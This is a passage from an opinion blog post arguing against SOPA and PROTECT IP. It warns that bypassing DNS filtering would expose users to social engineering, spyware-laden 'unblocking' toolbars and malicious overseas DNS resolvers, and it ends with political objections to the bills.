Given that your average internet user knows almost nothing about how the internet works internally, and most of them will click on anything, this is begging for disaster. Picture every 13 year old who wants to download the latest Hannah Montana song following a tutorial on how to tamper with DNS server settings. This isn’t speculation, it can and WILL happen. If you don’t believe me, ask the IT department at your local middle school how many hours were spent un-fucking their network and applying security patches and upgrades because of some kid bypassing filters or modifying network settings. (I know, I was that kid.)


Problem #3: Social Engineering

As more and more people start to bypass the DNS filtering put in place by Uncle Sam, they’ll be familiar with lots of warnings, antivirus temper tantrums, and words of wisdom. And just like they do now, they’ll ignore them. Why? Because it’ll be so commonplace. If you’re an Internet Explorer user, think of the last time the Information Bar appeared, and you just clicked the “Yeah, whatever. Show me what I’m looking for” option? How many times have you let a Java or JavaScript app run, without having the foggiest idea as to what it does? We do it all the time. We know the pop-up blocker is there for our own good, but we add exceptions without thinking, because we figure it’s being overly-sensitive. We allow programs to modify files and settings on our computer when we install new programs, and we don’t even know what they’re modifiying. What makes anyone think this won’t be a BIGGER problem when the content-sharing sites that so many of us love are blocked?

As people become accustomed to ignoring more and more errors and warnings, more opportunities will present for the malicious hackers. Again, the human element (stupidity and complacency) are huge factors in compromising networks and computers. Tons of survey sites, giveaway programs, adware, and sketchy porn sites are notoriously infested with stuff that’s bad for your computer. Fortunately, most of us don’t have a reason to visit shady web sites, and are wise to their scams, so that part of the internet isn’t a huge threat to educated internet users.

But what about a website that explains how their new program can let you watch YouTube videos again? It’s free (honest), just download our new toolbar and make sure it’s running anytime you’re online, particularly when you’re checking your bank accounts, e-mail, or entering credit card information. Bet the farm that, if SOPA or PROTECT IP pass, the internet will see tons of these sites popping up. Everything from spyware-infested toolbars to “secure” proxy sites to DIY tutorials written in barely-legible English.

I’ve also mentioned previously that it’s possible to use DNS servers outside of the US. If this becomes a popular method to bypass the filtering, users will eventually become comfortable with (or at least accustomed to) sending their DNS lookups overseas. They’ll get used to the slower connection time (because of the longer distance) and other hassles that come with it. But alas, even the more cautious people will eventually slip up and check their bank account in a hurry, forgetting that a malicious resolver can steer them to a fake site, and their credentials will be in the hands of the server operator. It only takes one slip-up, and your information could be stolen.

Summary

No matter which way you look at it, SOPA and PIPA are horrible ideas.

From a political stance, they promote the expansion of government (who’s going to monitor all this? Certainly, we’ll need a new department!) and infringement of First Amendment rights. They eliminate internet freedom in favor of special-interest groups (RIAA/MPAA), and will not stop piracy anyway. Hell, even RIAA and DHS employees have been caught downloading illegal music at work. It’s a gateway to more thorough internet censorship (give them an inch, they’ll take a mile), and similar laws have already been abused. It tampers with the inner workings of the internet, undermines the authentication the DNS was finally getting (DNSSEC), and exposes users to numerous security threats, viruses and cyberattacks.

Internet piracy, along with malware in all forms, is here to stay. People love free stuff, and will go out of their way to NOT pay for their music. After all, who has $30,000 to fill up their iPod? (I know, that’s a poor excuse.) In addition, this sets a dangerous precedent globally. Other countries may start to ask: if the United States, the epitome of liberty and freedom, can censor the internet, why can’t we?
